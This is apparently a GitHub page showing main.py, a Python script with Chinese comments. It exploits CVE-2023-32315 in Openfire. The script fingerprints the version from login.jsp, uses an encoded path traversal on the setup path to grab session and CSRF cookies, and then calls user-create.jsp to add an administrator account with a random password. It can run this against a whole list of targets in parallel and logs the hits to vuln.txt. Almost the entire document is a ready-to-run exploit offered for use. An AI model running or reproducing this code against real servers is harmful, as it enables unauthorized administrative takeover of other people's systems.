-
Notifications
You must be signed in to change notification settings - Fork 1
/
main.py
164 lines (140 loc) · 6.03 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
import random
import string
import argparse
from concurrent.futures import ThreadPoolExecutor
import re
import urllib.request
from urllib.error import HTTPError
def generate_random_string(length):
charset = string.ascii_lowercase + string.digits
result = ''.join(random.choice(charset) for _ in range(length))
return result
def match_url_path(url):
pattern = r'^http[s]?://([^/]+)'
match = re.match(pattern, url)
if match:
matched_string = match.group(1)
return 'http://' + matched_string
if not re.match(r'^\w+://', url):
return 'http://' + url
return None
def get_version(url):
try:
response = urllib.request.urlopen(url+"/login.jsp")
html_content = response.read().decode("utf-8")
# 使用正则表达式匹配并提取版本号
pattern = r"Openfire,.+?:\s*([\w\u4e00-\u9fa5]+\.\w+\.\w+)"
match = re.search(pattern, html_content)
if match:
version = match.group(1)
return version
return None
except HTTPError as e:
print(f"{url} - 发生HTTP错误:{e.code}")
return None
except Exception as e:
print(f"{url} - 发生错误:{str(e)}")
return None
def check_version_range(version):
if version >= "3.10.0" and version < "4.6.8":
return True
elif version >= "4.7.0" and version < "4.7.5":
return True
else:
return False
def verify(target):
result = {}
try:
# setup 1: 检查版本
print(f"{target} - 正在处理 setup 1...")
version = get_version(target)
if not version:
result['setup1'] = "无法获取版本信息"
return {target: result}
if not check_version_range(version):
result['setup1'] = f"该网站不在CVE-2023-32315漏洞影响范围"
return {target: result}
result['setup1'] = f"该网站版本为:{version}"
print(f"{target} - 正在处理 setup 2...")
# setup 2: 获取csrf和jsessionid
jsessionid = ""
csrf = ""
url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"
try:
response = urllib.request.urlopen(url)
except HTTPError as e:
if e.code == 500:
cookies = e.headers.get_all('Set-Cookie')
if len(cookies) == 1:
jsessionid = cookies[0].split('=')[1].split(';')[0]
if len(cookies) == 2:
jsessionid = cookies[0].split('=')[1].split(';')[0]
csrf = cookies[1].split('=')[1].split(';')[0]
else:
result['setup2'] = "该网站有误,请自行手动测试:" + f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
return {target: result}
result['setup2'] = f"成功获取目标JSESSIONID: {jsessionid} + csrf: {csrf}"
if jsessionid == "":
result['setup2'] = "Failed to get JSESSIONID or csrf value"
return {target: result}
print(f"{target} - 正在处理 setup 3...")
# setup 3: 添加用户
username = generate_random_string(6)
password = generate_random_string(6)
createUserUrl = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
headers = {"Cookie": f"JSESSIONID={jsessionid}; csrf={csrf}"}
# 创建Request对象并设置请求头
request = urllib.request.Request(createUserUrl, headers=headers)
# 发起GET请求
try:
res = urllib.request.urlopen(request)
if res.code == 200:
result['setup3'] = f"用户增加成功:username:{username} password:{password}"
else:
result['setup3'] = "用户添加失败。"
except Exception as e:
result['setup3'] = f"用户添加失败。发生错误:{str(e)}"
except Exception as e:
print(f"{target} - 发生错误:{str(e)}")
return {target: result}
def print_result(result):
for url, result in result.items():
print(f"{url}:\n")
for setup, msg in result.items():
print(f" {setup}: {msg}\n")
def main():
parser = argparse.ArgumentParser(description="执行命令:./CVE-2023-32315 -u http://127.0.0.1:9090")
parser.add_argument("-u", dest="target_url", help="目标URL")
parser.add_argument("-l", dest="file_path", help="URL文件路径")
parser.add_argument("-t", dest="thread", type=int, default=10, help="线程数,默认为10")
args = parser.parse_args()
finalresult = {}
if args.target_url:
url = match_url_path(args.target_url)
if url != None:
result = verify(url)
finalresult.update(result)
print_result(finalresult)
else:
print(f"请检查{args.target_url}是否有误")
elif args.file_path:
with open(args.file_path, 'r') as file:
targets = [match_url_path(line.strip()) for line in file if line.strip()]
with ThreadPoolExecutor(max_workers=args.thread) as executor:
results = []
for target in targets:
results.append(executor.submit(verify, target))
count = 1
for future in results:
result = future.result()
finalresult.update(result)
print(f"完成 {count}/{len(targets)}")
count += 1
file_name = "vuln.txt"
with open(file_name, 'w') as file:
for url, result in finalresult.items():
file.write(f"{url}:\n")
for setup, msg in result.items():
file.write(f" {setup}: {msg}\n")
if __name__ == "__main__":
main()